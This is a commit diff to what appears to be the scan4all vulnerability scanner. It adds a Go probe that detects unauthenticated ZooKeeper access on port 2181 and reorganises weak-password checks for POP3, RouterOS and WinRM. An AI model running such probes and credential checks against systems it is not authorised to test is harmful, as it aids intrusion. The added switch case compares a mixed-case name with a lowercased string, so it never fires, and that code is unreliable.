	15	+	tags: wpscan,wordpress,wp-plugin,rce,intrusive,fileupload,python
16	16
17	17		requests:
18	18		- raw:
		skipped 62 lines

■ ■ ■ ■ ■ ■

pkg/hydra/doNmapResult.go

		skipped 99 lines
100	100		FinalURL: szUlr,
101	101		Checklog4j: false,
102	102		}
	103	+	} else if bCheckWeakPassword && "110" == szPort && service == "pop3" {
	104	+	CheckWeakPassword(ip, service, port)
	105	+	} else if "2181" == szPort {
	106	+	util.PocCheck_pipe <- &util.PocCheck{
	107	+	Wappalyzertechnologies: &[]string{"ZookeeperUnauthority"},
	108	+	URL: szUlr,
	109	+	FinalURL: szUlr,
	110	+	Checklog4j: false,
	111	+	}
103	112		}
104		-	} else if bCheckWeakPassword && "110" == szPort && service == "pop3" {
105		-	CheckWeakPassword(ip, service, port)
106		-	} else if bCheckWeakPassword && "8728" == szPort && service == "unknown" {
107		-	CheckWeakPassword(ip, "router", port)
108		-	} else if bCheckWeakPassword && ("5985" == szPort \|\| "5986" == szPort) && -1 < strings.Index(service, "microsoft ") {
109		-	CheckWeakPassword(ip, "winrm", port)
	113	+	}
	114	+	if bCheckWeakPassword {
	115	+	if "8728" == szPort && service == "unknown" {
	116	+	CheckWeakPassword(ip, "router", port)
	117	+	} else if ("5985" == szPort \|\| "5986" == szPort) && -1 < strings.Index(service, "microsoft ") {
	118	+	CheckWeakPassword(ip, "winrm", port)
	119	+	}
110	120		}
111	121
112	122		log.Printf("%s\t%d\t%s\n", ip, port, service)
		skipped 49 lines

■ ■ ■ ■ ■ ■

pocs_go/apache/poc-go-zookeeper-unauth.go

1	+	package apache
2	+
3	+	import (
4	+	"github.com/hktalent/scan4all/lib/socket"
5	+	"strings"
6	+	)
7	+
8	+	// ZookeeperUnauthority zookeeper 未授权
9	+	//
10	+	// addr := args.Host + ":2181"
11	+	func ZookeeperUnauthority(szUrl string) bool {
12	+	payload := "envidddfdsfsafafaerwrwerqwe"
13	+	x1 := socket.NewCheckTarget(szUrl, "tcp", 10)
14	+	defer x1.Close()
15	+	_, err := x1.ConnTarget()
16	+	if err != nil {
17	+	return false
18	+	}
19	+	x1.WriteWithFlush(payload)
20	+	s1 := *x1.ReadAll2Str()
21	+	if "" != s1 && -1 < strings.Index(s1, "Environment") {
22	+	return true
23	+	}
24	+	return false
25	+	}
26	+

■ ■ ■ ■ ■ ■

pocs_go/go_poc_check.go

		skipped 45 lines
46	46		for tech := range wappalyzertechnologies {
47	47		caseStr := strings.ToLower(wappalyzertechnologies[tech])
48	48		switch caseStr {
	49	+	case "ZookeeperUnauthority":
	50	+	if apache.ZookeeperUnauthority(finalURL) {
	51	+	technologies = append(technologies, fmt.Sprintf("ZookeeperUnauthority %s", finalURL))
	52	+	}
49	53		case "httpCheckSmuggling":
50	54		Smuggling.DoCheckSmuggling(finalURL, "")
51	55		case "RouterOS":
		skipped 259 lines

Up PoCs 2022-09-01